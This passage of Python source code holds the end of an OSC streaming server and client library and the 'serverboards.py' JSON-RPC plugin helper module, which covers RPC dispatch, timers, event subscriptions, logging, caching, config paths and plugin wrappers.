if e[0] == errno.EPIPE: # broken pipe
return False
raise e
def _receive(self, count):
""" Receive a certain amount of data from the socket and return it. If the
remote end is closed in the meanwhile, None is returned.
"""
chunk = self.connection.recv(count)
if not chunk or len(chunk) == 0:
return None
while len(chunk) < count:
tmp = self.connection.recv(count - len(chunk))
if not tmp or len(tmp) == 0:
return None
chunk = chunk + tmp
return chunk
def _receiveMsg(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receive(4)
if chunk == None:
print "SERVER: Socket has been closed."
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receive(slen)
if chunk == None:
print "SERVER: Socket has been closed."
return None
# decode OSC data and dispatch
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("SERVER: Message decoding failed.")
return msg
def handle(self):
"""
Handle a connection.
"""
# set socket blocking to avoid "resource currently not available"
# exceptions, because the connection socket inherits the settings
# from the listening socket and this times out from time to time
# in order to provide a way to shut the server down. But we want
# clean and blocking behaviour here
self.connection.settimeout(None)
print "SERVER: Entered server loop"
try:
while True:
decoded = self._receiveMsg()
if decoded == None:
return
elif len(decoded) <= 0:
# if message decoding fails we try to stay in sync but print a message
print "OSC stream server: Spurious message received."
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
# no replies, continue receiving
continue
self._txMutex.acquire()
txOk = self._transmitMsg(msg)
self._txMutex.release()
if not txOk:
break
except socket.error, e:
if e[0] == errno.ECONNRESET:
# if connection has been reset by client, we do not care much
# about it, we just assume our duty is fulfilled
print "SERVER: Connection has been reset by peer."
else:
raise e
def sendOSC(self, oscData):
""" This member can be used to transmit OSC messages or OSC bundles
over the client/server connection. It is thread-safe.
"""
self._txMutex.acquire()
result = self._transmitMsg(oscData)
self._txMutex.release()
return result
""" TODO Note on threaded unbundling for streaming (connection oriented)
transport:
Threaded unbundling as implemented in ThreadingOSCServer must be implemented in
a different way for the streaming variant, because contrary to the datagram
version the streaming handler is instantiated only once per connection. This
leads to the problem (if threaded unbundling is implemented as in OSCServer)
that all further message reception is blocked until all (previously received)
pending messages are processed.
Each StreamRequestHandler should provide a so-called processing queue in which
all pending messages or subbundles are inserted, to be processed in the future.
When a subbundle or message gets queued, a mechanism must be provided so that
those messages get invoked when their time arrives. There are the following
options:
- a timer is started which checks at regular intervals for messages in the
queue (polling - requires CPU resources)
- a dedicated timer is started for each message (requires timer resources)
"""
class OSCStreamingServer(TCPServer):
""" A connection oriented (TCP/IP) OSC server.
"""
# define a socket timeout, so the serve_forever loop can actually exit.
# with 2.6 and server.shutdown this wouldn't be necessary
socket_timeout = 1
# this is the class which handles a new connection. Override this for a
# useful customized server. See the testbench for an example
RequestHandlerClass = OSCStreamRequestHandler
def __init__(self, address):
"""Instantiate an OSCStreamingServer.
- address ((host, port) tuple): the local host & TCP-port
the server listens on for new connections.
"""
self._clientList = []
self._clientListMutex = threading.Lock()
TCPServer.__init__(self, address, self.RequestHandlerClass)
self.socket.settimeout(self.socket_timeout)
def serve_forever(self):
"""Handle one request at a time until server is closed.
Had to add this since 2.5 does not support server.shutdown()
"""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def start(self):
""" Start the server thread. """
self._server_thread = threading.Thread(target=self.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
def stop(self):
""" Stop the server thread and close the socket. """
self.running = False
self._server_thread.join()
self.server_close()
# 2.6 only
#self.shutdown()
def _clientRegister(self, client):
""" Gets called by each request/connection handler when connection is
established to add itself to the client list
"""
self._clientListMutex.acquire()
self._clientList.append(client)
self._clientListMutex.release()
def _clientUnregister(self, client):
""" Gets called by each request/connection handler when connection is
lost to remove itself from the client list
"""
self._clientListMutex.acquire()
self._clientList.remove(client)
self._clientListMutex.release()
def broadcastToClients(self, oscData):
""" Send OSC message or bundle to all connected clients. """
result = True
for client in self._clientList:
result = result and client.sendOSC(oscData)
return result
class OSCStreamingServerThreading(ThreadingMixIn, OSCStreamingServer):
""" Implements a server which spawns a separate thread for each incoming
connection. Care must be taken, since the OSC address space is shared by all
connections.
"""
pass
class OSCStreamingClient(OSCAddressSpace):
""" OSC streaming client.
A streaming client establishes a connection to a streaming server but must
be able to handle replies by the server as well. To accomplish this the
receiving takes place in a secondary thread, because no one knows if we
have to expect a reply or not, i.e. synchronous architecture doesn't make
much sense.
Replies will be matched against the local address space. If message
handlers access code of the main thread (where the client messages are sent
to the server), care must be taken, e.g. by installing synchronization
mechanisms or by using an event dispatcher which can handle events
originating from other threads.
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
rcvbuf_size = 4096 * 8
def __init__(self):
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.rcvbuf_size)
self.socket.settimeout(1.0)
self._running = False
def _receiveWithTimeout(self, count):
chunk = str()
while len(chunk) < count:
try:
tmp = self.socket.recv(count - len(chunk))
except socket.timeout:
if not self._running:
print "CLIENT: Socket timed out and termination requested."
return None
else:
continue
except socket.error, e:
if e[0] == errno.ECONNRESET:
print "CLIENT: Connection reset by peer."
return None
else:
raise e
if not tmp or len(tmp) == 0:
print "CLIENT: Socket has been closed."
return None
chunk = chunk + tmp
return chunk
def _receiveMsgWithTimeout(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receiveWithTimeout(4)
if not chunk:
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receiveWithTimeout(slen)
if not chunk:
return None
# decode OSC content
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("CLIENT: Message decoding failed.")
return msg
def _receiving_thread_entry(self):
print "CLIENT: Entered receiving thread."
self._running = True
while self._running:
decoded = self._receiveMsgWithTimeout()
if not decoded:
break
elif len(decoded) <= 0:
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
continue
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
if not txOk:
break
print "CLIENT: Receiving thread terminated."
def _unbundle(self, decoded):
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.socket.getpeername())
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def connect(self, address):
self.socket.connect(address)
self.receiving_thread = threading.Thread(target=self._receiving_thread_entry)
self.receiving_thread.start()
def close(self):
# let socket time out
self._running = False
self.receiving_thread.join()
self.socket.close()
def _transmitWithTimeout(self, data):
sent = 0
while sent < len(data):
try:
tmp = self.socket.send(data[sent:])
except socket.timeout:
if not self._running:
print "CLIENT: Socket timed out and termination requested."
return False
else:
continue
except socket.error, e:
if e[0] == errno.ECONNRESET:
print "CLIENT: Connection reset by peer."
return False
else:
raise e
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsgWithTimeout(self, msg):
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmitWithTimeout(len_big_endian) and self._transmitWithTimeout(binary):
return True
else:
return False
def sendOSC(self, msg):
"""Send an OSC message or bundle to the server. Returns True on success.
"""
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
return txOk
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.socket.getpeername()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
isequal = cmp(self.socket._sock, other.socket._sock) == 0
if isequal and getattr(self, 'server', None) and getattr(other, 'server', None):
return cmp(self.server, other.server) == 0
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
# vim:noexpandtab
|
serverboards.py
|
import json
import os
import sys
import select
import time
import io
import threading
import sh as real_sh
from contextlib import contextmanager
plugin_id = os.environ.get("PLUGIN_ID")
# May be overwritten by the user program to force all errors to the log
stderr = sys.stderr
def ellipsis_str(str, maxs=50):
if len(str) < maxs:
return str
else:
firsth = int(maxs * 3 / 4)
lasth = maxs - firsth
return "%s...%s" % (str[:firsth], str[-lasth:])
class RPC:
"""
Manages all the RPC status and calls.
"""
def __init__(self, stdin, stdout):
"""
Initialize the JSON-RPC communication object.
This class allows registering methods, event handlers, timers and file
descriptor handlers to ease the communication using JSON-RPC.
# Parameters
param | type | description
-------|----------|------------
stdin | file | Which input file to use to read JSON-RPC calls.
stdout | file | File to write JSON-RPC calls. The remote endpoint.
"""
self.__rpc_registry = {}
# ensure input is utf8,
# https://stackoverflow.com/questions/16549332/python-3-how-to-specify-stdin-encoding
self.__stdin = None
self.stdout = stdout
self.__loop_status = 'OUT' # IN | OUT | EXIT
self.__requestq = [] # requests that are pending to do
self.__replyq = {} # replies got out of order: id to msg
self.__send_id = 1 # current id to send
self.__manual_replies = set() # ids that have already been answered via `reply`
self.__fdevents = {}
# timer_id -> (next_stop, id, seconds, continuation)
self.__timers = {}
self.__timer_id = 1
self.__subscriptions = {}
self.__subscriptions_ids = {}
self.__subscription_id = 1
self.__pending_events_queue = []
# This is the last id received from the other side
self.__last_rpc_id = 0
# id to callback when receiving asynchronous responses
self.__async_cb = {}
self.__debug = False
# functions to be called ASAP at the main loops
self.__call_soon = []
# Async events, managed at the __event_signal_r/w fds
# If a 4 byte int is written to event_signal_w, that event is
# triggered to be returned by loop_until(event=id)
self.__event_id = 1
self.__event_results = {}
self.__events = {}
r, w = os.pipe()
r, w = os.fdopen(r, "rb"), os.fdopen(w, "wb")
self.__event_signal_r = r
self.__event_signal_w = w
self.add_event(self.__event_signal_r, self.__received_event)
self.set_stdin(stdin)
def __received_event(self):
"""
Read an event at __event_signal_r, and mark it as received.
"""
event_idb = self.__event_signal_r.read(4)
event_id = int.from_bytes(event_idb, "big")
del self.__events[event_id]
def __call_local(self, rpc):
"""
Performs a local call into a registered method.
This is used internally for all incoming RPC calls.
"""
method = rpc['method']
params = rpc['params'] or []
call_id = rpc.get('id')
(args, kwargs) = ([], params) if type(params) == dict else (params, {})
if method in self.__rpc_registry:
f = self.__rpc_registry[method]
try:
# print(method, params, args, kwargs)
res = f(*args, **kwargs)
return {
'result': res,
'id': call_id
}
except Exception as e:
log_traceback()
return {
'error': str(e),
'id': call_id
}
if not call_id:
self.__emit_event(method, *args, **kwargs)
else:
return {'error': 'unknown_method %s' % method, 'id': call_id}
def __emit_event(self, method, *args, **kwargs):
"""
Emits the event to the subscription watchers.
It takes care of avoiding re-entry, as that leads to bugs: for
example, while processing data from one event and doing a remote call,
another event arrives and finishes before the first.
This is a real race condition seen when writing to a file.
The code here avoids that situation by making events non-reentrant; if
an event is being processed, newer ones are queued to be delivered later.
"""
do_later = len(self.__pending_events_queue) > 0
self.__pending_events_queue.append((method, args, kwargs))
if do_later:
debug("No emit %s yet, as processing something else" % method)
return
# debug("Check subscriptions %s in %s"%(method,
# repr(self.__subscriptions.keys())))
# do all the items on the queue
while len(self.__pending_events_queue) > 0:
(method, args, kwargs) = self.__pending_events_queue[0]
if method in self.__subscriptions:
for f in self.__subscriptions[method]:
if f:
try:
# debug("Calling %s b/o event %s(%s)" %
# (f, method, args or kwargs))
f(*args, **kwargs)
except Exception:
log_traceback()
# pop from top
self.__pending_events_queue = self.__pending_events_queue[1:]
def __loop(self):
"""
Enter the remote read loop.
This loop also handles the timers and select()s on any extra registered fds.
"""
prev_status = self.__loop_status
self.__loop_status = 'IN'
# pending requests
while self.__requestq:
rpc = self.__requestq[0]
self.__requestq = self.__requestq[1:]
self.__process_line(rpc)
# incoming
while self.__loop_status == 'IN':
# debug("Wait fds: %s" %
# ([x.fileno() for x in self.__fdevents.keys()]))
self.__loop_one()
self.__loop_status = prev_status
def __loop_one(self):
# Call pending call_soon, in FIFO mode. New may appear while
# processing this, and its ok
while self.__call_soon:
cb = self.__call_soon[0]
try:
cb()
except Exception:
log_traceback()
self.__call_soon = self.__call_soon[1:]
if self.__timers:
timer = min(self.__timers.values(), key=lambda x: x.next)
next_timeout = timer.next - time.time()
else:
timer = None
next_timeout = None
# debug("Next timeout", next_timeout, timeout_id)
# print("Wait for ", self.__fdevents.keys(),
# next_timeout, file=stderr)
if not next_timeout or next_timeout >= 0:
res = select.select(self.__fdevents.keys(), [], [], next_timeout)
read_ready = res[0]
else: # maybe timeout already expired
read_ready = []
# print("Select finished: ", res, next_timeout, file=stderr)
if read_ready:
for ready in read_ready:
try:
self.__fdevents[ready]()
except Exception:
log_traceback()
elif timer: # timeout
if timer.rearm:
timer.arm()
else:
del self.__timers[timer.id]
# rearm ?? Docs says no rearming
try:
timer.cont()
except Exception:
log_traceback()
def __loop_until(self, id=None, event=None, method=None):
"""
Performs an inner loop while calling into the server.
It is like the main loop, but runs only until it gets the proper reply.
Requires the id of the reply to wait for, and the name of the method
for error reporting.
"""
# mini loop, may request calls while here
while self.__loop_status != "EXIT":
# if waiting for event, and event is no more, return
# print("Wait for events ", self.__events, file=stderr)
# I wait for an event, and its not there, then it has happened
if event and not self.__events.get(event):
# print("Return from event ", event, file=stderr)
return
rpc = self.__replyq.get(id)
if rpc:
del self.__replyq[id]
if 'result' in rpc:
return rpc['result']
else:
if rpc["error"] == "unknown_method":
raise Exception("unknown_method %s" % method)
raise Exception(rpc["error"])
# this is last, so that if conditions are fulfilled at start, just
# return
self.__loop_one()
def __read_parse_line(self):
"""
Reads a line from the RPC input stream and parses it.
"""
line = self.__stdin.readline()
if self.__debug:
print("%s<< %s" % (plugin_id, line), file=stderr, end='\r\n')
if not line:
self.stop()
return
rpc = json.loads(line)
self.__process_line(rpc)
def __process_line(self, rpc):
"""
Processes a decoded JSON-RPC line.
Depending on its keys, the line is dispatched either as a result/error
for a pending call or as an incoming method call.
"""
if "result" in rpc or "error" in rpc:
return self.__process_result(rpc)
if "method" in rpc:
return self.__process_call(rpc)
raise Exception("unknown line type: %s" % (rpc.keys(),))
def __process_result(self, rpc):
id = rpc.get("id")
# Might be an asynchronous result or error
async_cb = self.__async_cb.get(id)
if async_cb:
# User can set only success condition, or a tuple with both
error_cb = None
if type(async_cb) == tuple:
async_cb, error_cb = async_cb
try: # try to call the error or result handlers
if async_cb and 'result' in rpc:
async_cb(rpc.get("result"))
elif error_cb and 'error' in rpc:
error_cb(rpc.get("error"))
except Exception:
log_traceback()
del self.__async_cb[id]
# Or just an answer
else:
# keep it in the response store, later will check if ready
self.__replyq[id] = rpc
def __process_call(self, rpc):
# If not ready yet to process requests, queue it for later.
if self.__loop_status != 'IN':
self.__requestq.append(rpc)
return
self.__last_rpc_id = rpc.get("id")
res = self.__call_local(rpc)
# subscriptions do not give back a response
if not res:
return
# might be already answered via `reply`
if res.get("id") in self.__manual_replies:
self.__manual_replies.discard(res.get("id"))
return
# normal case
try:
self.__println(json.dumps(res))
except Exception:
log_traceback()
self.__println(json.dumps({
"error": "serializing json response",
"id": res["id"]
}))
def __println(self, line):
"""
Writes a line to the external endpoint.
Centralizing output here allows for easy debugging and handling of some error conditions.
"""
try:
if self.__debug:
print("%s>> %s" % (plugin_id, line), file=stderr, end='\r\n')
self.stdout.write(line + '\n')
self.stdout.flush()
except IOError:
if self.__loop_status == 'EXIT':
sys.exit(1)
self.stop()
def add_method(self, name, f):
"""
Adds a method to the local method registry.
All local methods that can be called by the remote endpoint have to be
registered here.
Normally the `@rpc_method` decorator is used for ease of use.
"""
self.__rpc_registry[name] = f
def loop(self):
"""
Starts the remote reading mode.
This loops indefinitely until stop() is called.
"""
self.__loop()
def loop_until(self, id=None, event=None):
return self.__loop_until(id, event)
def stop(self):
"""
Forces loop stop on next iteration.
This can be used to force program stop, although normally
serverboards will emit a SIGSTOP signal to stop processes when
required.
"""
self.__loop_status = 'EXIT'
debug("--- EOF ---")
def set_debug(self, debug=True):
"""
Enables debug mode, showing all communications.
"""
self.__debug = debug
print("DEBUG MODE ON", file=stderr, end='\r\n')
def set_stdin(self, stdin):
"""
Replaces current stdin for RPC
Can be used for testing.
"""
if stdin == sys.stdin:
stdin = io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8')
if self.__stdin:
self.remove_event(self.__stdin)
# stdin may be None, in which case the loop becomes infinite until
# stop() is called
if stdin is not None:
self.add_event(stdin, self.__read_parse_line)
self.__stdin = stdin
def add_event(self, fd, cont):
"""
Watches for changes on an external file descriptor and calls the
continuation function.
This allows this class to also listen for external processes and file
descriptor changes.
# Parameters
param | type | description
------|------------|------------
fd | file | File-like object (or anything select() accepts)
cont | function() | Continuation function to call when new data ready
"""
if fd not in self.__fdevents:
self.__fdevents[fd] = cont
def remove_event(self, fd):
"""
Removes an event from the event watching list
"""
if fd in self.__fdevents:
del self.__fdevents[fd]
return True
return False
class Timer:
"""
Data about timers
"""
def __init__(self, id, interval, cont, rearm):
self.next = None
self.id = id
self.interval = interval
self.cont = cont
self.rearm = rearm
self.arm()
def arm(self):
self.next = time.time() + self.interval
return self
def add_timer(self, interval, cont, rearm=False):
"""
Adds a timer to the rpc object.
After the given interval the continuation function will be called.
By default the timer is not rearmed; pass rearm=True to make it
periodic, or add it again from the caller.
These timers are not realtime, and may fire well after the
timer expires if the process is performing other actions, but will be
called as soon as possible.
# Parameters
param | type | description
------|------------|------------
interval | float | Time in seconds to wait until calling this timer
cont | function() | Function to call when the timer expires.
rearm | bool | Whether this timer automatically rearms. [false]
# Returns
timer_id : int
Timer id to be used for later removal of timer
"""
assert interval and cont, "Required interval and continuation"
tid = self.__timer_id
self.__timers[tid] = RPC.Timer(tid, interval, cont, rearm)
self.__timer_id += 1
return tid
def remove_timer(self, tid):
"""
Removes a timer.
"""
if tid in self.__timers:
del self.__timers[tid]
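# Illustrative sketch (not part of the original module): a repeating
# heartbeat timer. The event name below is an assumption for the example.
#
#     def heartbeat():
#         rpc.event("plugin.ping")
#
#     tid = rpc.add_timer(60, heartbeat, rearm=True)
#     ...
#     rpc.remove_timer(tid)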
def event(self, method, *params, **kparams):
"""
Sends an event to the other side
"""
rpcd = dict(method=method, params=params or kparams)
try:
rpc = json.dumps(rpcd)
self.__println(rpc)
except TypeError:
error("Invalid JSON data: ", repr(rpcd))
def reply(self, result):
"""
Short-circuits request processing by returning an immediate answer; the
handler's final return value will be ignored.
This allows starting long-running processes that may send events in a
loop.
If more calls are expected, it is recommended to spawn new threads.
"""
self.__manual_replies.add(self.__last_rpc_id)
self.__println(json.dumps({
"id": self.__last_rpc_id,
"result": result
}))
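# Illustrative sketch (not part of the original module): replying early from
# a handler so it can keep emitting events afterwards. The method, event
# name and follow() helper are assumptions for the example.
#
#     @rpc_method
#     def watch(path):
#         rpc.reply("watching")          # the caller gets this answer now
#         for change in follow(path):    # hypothetical long-running loop
#             rpc.event("file.changed", change)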
def call(self, method, *params, _async=False, **kwparams):
"""
Calls a method on the other side and waits for the answer.
If a call is received while waiting for the answer, there are two behaviours:
1. If inside self.loop, the request is processed immediately.
2. If not, it is queued to be processed when loop is called.
This allows setting up the environment first.
Optional arguments:
* _async -- Set to a callback to be called when the answer is
received, making the call asynchronous. The callback receives
the answer, or None in case of error.
"""
id = self.__send_id
self.__send_id += 1
# If both are given, pass kwparams as the last positional argument. This
# sensible default works, for example, for action calls that pass further
# calls on to plugins.
if params and kwparams:
params = [*params, kwparams]
rpc = json.dumps(dict(method=method, params=params or kwparams, id=id))
self.__println(rpc)
if _async: # Will get answer later calling the _async callback
self.__async_cb[id] = _async
return
return self.__loop_until(id, method=method)
def subscribe(self, event, callback):
"""
Subscribes to a server event, calling callback(eventdata) when it
happens.
Returns a subscription id that can be used to unsubscribe.
"""
# the event may be of the form event[context]; we key by the event name only,
# as only event names are sent back.
eventname = event.split('[', 1)[0]
sid = self.__subscription_id
events = self.__subscriptions.get(eventname, []) + [callback]
self.__subscriptions[eventname] = events
self.__subscriptions_ids[sid] = (eventname, callback)
self.call("event.subscribe", event)
self.__subscription_id += 1
# debug("Subscribed to %s" % event)
# debug("Added subscription %s id %s: %s"%(eventname, sid,
# repr(self.__subscriptions[eventname])))
return sid
def unsubscribe(self, subscription_id):
"""
Unsubscribes from an event.
"""
if subscription_id in self.__subscriptions_ids:
debug("%s in %s" %
(subscription_id, repr(self.__subscriptions_ids))
)
(event, callback) = self.__subscriptions_ids[subscription_id]
self.__subscriptions[event] = [
x for x in self.__subscriptions[event] if x != callback
]
# debug("Removed subscription %s id %s" % (event, subscription_id))
self.call("event.unsubscribe", event)
del self.__subscriptions_ids[subscription_id]
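# Illustrative sketch (not part of the original module): subscribing to a
# server event and later unsubscribing. The event name is an assumption.
#
#     def on_service_updated(data):
#         info("service updated", service=data)
#
#     sid = rpc.subscribe("service.updated", on_service_updated)
#     ...
#     rpc.unsubscribe(sid)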
def thread_run(self, cmd, *args, **kwargs):
"""
Runs a function in another thread and returns its result on completion,
while keeping the loop running.
This effectively means that the function does not block the
event loop.
"""
id = self.__event_id
self.__event_id += 1
def run():
result = cmd(*args, **kwargs)
self.__event_results[id] = result
self.__event_signal_w.write(id.to_bytes(4, "big"))
self.__event_signal_w.flush()
thread = threading.Thread(target=run)
thread.start()
self.__events[id] = thread.join
# "context" switch
self.loop_until(event=id)
res = self.__event_results[id]
del self.__event_results[id]
return res
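# Illustrative sketch (not part of the original module): running a blocking
# call in another thread while the RPC loop keeps serving requests. Assumes
# the `requests` library is available; the method name is made up.
#
#     @rpc_method
#     def fetch(url):
#         return rpc.thread_run(requests.get, url).text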
def call_soon(self, callback):
"""
Call ASAP the given callback, inside the loop
"""
self.__call_soon.append(callback)
def status(self):
"""
Returns current loop status
"""
return self.__loop_status
def method_list(self):
"""
Returns the list of known methods, for `dir` purposes.
"""
return self.__rpc_registry.keys()
# RPC singleton
rpc = RPC(sys.stdin, sys.stdout)
sys.stdout = stderr # allow debugging by print
def rpc_method(f):
"""
Decorator to add this method to the known RPC methods.
Use as simple decorator:
```python
@rpc_method
def func(param1, param2):
....
```
or with a specific name
```python
@rpc_method("rpc-name")
def func(param1=None):
...
```
"""
if type(f) == str:
method_name = f
def regf(f):
# print("Registry %s: %s"%(method_name, repr(f)))
rpc.add_method(method_name, f)
return f
return regf
else:
# print("Registry %s"%(f.__name__))
rpc.add_method(f.__name__, f)
return f
@rpc_method("dir")
def __dir():
"""
Returns the list of all registered methods.
Normally used by the other endpoint.
"""
return list(rpc.method_list())
def loop():
"""
Wrapper to easily start the rpc loop.
stdin and stdout may be replaced beforehand (see set_stdin). Use only for
debugging; the change is permanent.
The normal stdin may not be UTF-8. To force it, do:
```
stdin = io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8')
```
"""
rpc.loop()
class WriteTo:
def __init__(self, fn, **extra):
self.fn = fn
self.extra = extra
def __call__(self, *args, **extra):
nextra = {**{"level": 1}, **self.extra, **extra}
if not args: # if no data, add extras for contexts.
return WriteTo(self.fn, **nextra)
self.fn(*args, **nextra)
def write(self, data, *args, **extra):
if data.endswith('\n'):
data = data[:-1]
self.fn(data, *args, **{**{"level": 1}, **self.extra, **extra})
def flush(*args, **kwargs):
pass
@contextmanager
def context(self, level=2, **extra):
value = io.StringIO()
yield value
value.seek(0)
self.fn(value.read(), **{**{"level": level}, **self.extra, **extra})
def log_(rpc, type):
def decorate_log(extra, level=2):
"""
Helper that decorates the given log message with the function, line
and file that issued the log call.
"""
import inspect
callerf = inspect.stack()[level]
caller = {
"plugin_id": plugin_id,
"function": callerf[3],
"file": callerf[1],
"line": callerf[2],
"pid": os.getpid(),
}
caller.update(extra)
return caller
log_method = "log.%s" % type
def log_inner(*msg, level=0, file=None, **extra):
msg = ' '.join(str(x) for x in msg)
if file is not None:
file.write(msg + "\n")
if not msg:
return
return rpc.event(
log_method,
str(msg),
decorate_log(extra, level=level + 2)
)
return log_inner
error = WriteTo(log_(rpc, "error"))
debug = WriteTo(log_(rpc, "debug"))
info = WriteTo(log_(rpc, "info"))
warning = WriteTo(log_(rpc, "warning"))
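# Illustrative sketch (not part of the original module): the log helpers
# above can be used as plain functions, with extra context fields, or as
# file-like objects. The field names are assumptions for the example.
#
#     info("service started", service_id="xxxx")   # extra fields travel with the event
#     with debug.context() as out:
#         out.write("first line of a multi-line dump\n")
#         out.write("second line\n")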
real_print = print
def print(*args, file=None, **kwargs):
"""
Wraps the real print so that bare print calls go to the debug
log.
If the file= kwarg is given, the normal print is used.
"""
if file is None:
debug(*args, **kwargs)
else:
real_print(*args, file=file, **kwargs)
def log_traceback():
"""
Logs the current traceback to the error log.
"""
import traceback
traceback.print_exc(file=error)
def __simple_hash__(*args, **kwargs):
hs = ";".join(str(x) for x in args)
hs += ";"
hs += ";".join(
"%s=%s" % (
__simple_hash__(k),
__simple_hash__(kwargs[k])
) for k in sorted(kwargs.keys()))
return hash(hs)
def cache_ttl(ttl=10, maxsize=50, hashf=__simple_hash__):
"""
Simple decorator, not very efficient, for a time-based cache.
Params:
ttl -- seconds an entry may live. After this time the next use evicts
it and recomputes the value.
maxsize -- if trying to add more than maxsize elements, the oldest ones
will be evicted.
hashf -- hash function for the arguments. Defaults to using the arguments
themselves as keys, but may require customization.
"""
def wrapper(f):
data = {}
def wrapped(*args, **kwargs):
nonlocal data
currentt = time.time()
if len(data) >= maxsize:
# first take out all expired
data = {
k: (timeout, v)
for k, (timeout, v) in data.items()
if timeout > currentt
}
if len(data) >= maxsize:
# not enough, expire oldest
oldest_k = None
oldest_t = currentt + ttl
for k, (timeout, v) in data.items():
if timeout < oldest_t:
oldest_k = k
oldest_t = timeout
del data[oldest_k]
assert len(data) < maxsize
if not args and not kwargs:
hs = None
else:
hs = hashf(*args, **kwargs)
timeout, value = data.get(hs, (currentt, None))
if timeout <= currentt or not value:
# recalculate
value = f(*args, **kwargs)
# store
data[hs] = (currentt + ttl, value)
return value
def invalidate_cache():
nonlocal data
data = {}
wrapped.invalidate_cache = invalidate_cache
return wrapped
return wrapper
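# Illustrative sketch (not part of the original module): caching an expensive
# remote lookup for ten seconds. The function below is made up for the example.
#
#     @cache_ttl(ttl=10, maxsize=100)
#     def get_service(uuid):
#         return rpc.call("service.get", uuid)
#
#     get_service("xxxx")              # computed and cached
#     get_service("xxxx")              # served from the cache until the ttl expires
#     get_service.invalidate_cache()   # drops every cached entry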
class Config:
"""
Easy access to configuration data for this plugin.
"""
def __init__(self):
self.path = os.path.expanduser(
os.environ.get('SERVERBOARDS_PATH', '~/.local/serverboards/')
)
Config.__ensure_path_exists(self.path)
def file(self, filename):
"""
Gets the absolute path of a local file for this plugin.
This uses the serverboards-configured local storage for the current
plugin.
"""
p = os.path.join(self.path, filename)
if not p.startswith(self.path):
raise Exception("Trying to escape from config directory.")
Config.__ensure_path_exists(os.path.dirname(p))
return p
@staticmethod
def __ensure_path_exists(path):
try:
os.makedirs(path, 0o0700)
except OSError as e:
if 'File exists' not in str(e):
raise
# config singleton
config = Config()
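# Illustrative sketch (not part of the original module): storing plugin state
# in the per-plugin directory. The filename and `state` variable are
# assumptions for the example.
#
#     path = config.file("state.json")
#     with open(path, "w") as fd:
#         json.dump(state, fd)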
class Plugin:
"""
Wraps a plugin to easily call the methods in it.
It has no recovery logic.
Passing kill_and_restart=True ensures the plugin is dead before use. This
is only useful in tests.
"""
class Method:
def __init__(self, plugin, method):
self.plugin = plugin
self.method = method
def __call__(self, *args, **kwargs):
return self.plugin.call(self.method, *args, **kwargs)
def __init__(self, plugin_id, kill_and_restart=False, restart=True):
self.plugin_id = plugin_id
if kill_and_restart:
try:
rpc.call("plugin.kill", plugin_id)
time.sleep(1)
except Exception:
pass
self.restart = restart
self.start()
def __getattr__(self, method):
if not self.uuid:
self.uuid = rpc.call("plugin.start", self.plugin_id)
return Plugin.Method(self, method)
def start(self):
self.uuid = rpc.call("plugin.start", self.plugin_id)
return self
def stop(self):
"""
Stops the plugin.
"""
if not self.uuid: # not running
return self
rpc.call("plugin.stop", self.uuid)
self.uuid = None
return self
RETRY_EVENTS = ["exit", "unknown_plugin at plugin.call", "unknown_plugin"]
def call(self, method, *args, _async=False, **kwargs):
"""
Call a method by name.
This is also a workaround for calling remote methods named `call` or `stop`.
"""
try:
return rpc.call(
"plugin.call",
self.uuid,
method,
args or kwargs,
_async=_async
)
except Exception as e:
# If the plugin exited or plugin.call returns unknown method (referring to
# the method to call at the plugin), restart and try again.
if (str(e) in Plugin.RETRY_EVENTS) and self.restart:
# if the error is because it exited, and we may restart,
# restart and try again (no loop)
debug("Restarting plugin", self.plugin_id)
self.start()
return rpc.call(
"plugin.call",
self.uuid,
method,
args or kwargs
)
else:
raise
def __enter__(self):
return self
def __exit__(self, _type, _value, _traceback):
try:
self.stop()
except Exception as ex:
if str(ex) != "cant_stop at plugin.stop":
raise
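# Illustrative sketch (not part of the original module): calling into another
# plugin through the Plugin wrapper. The plugin id and method name are
# assumptions for the example.
#
#     with Plugin("serverboards.example.ping") as other:
#         latency = other.ping("8.8.8.8")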
class SH:
"""
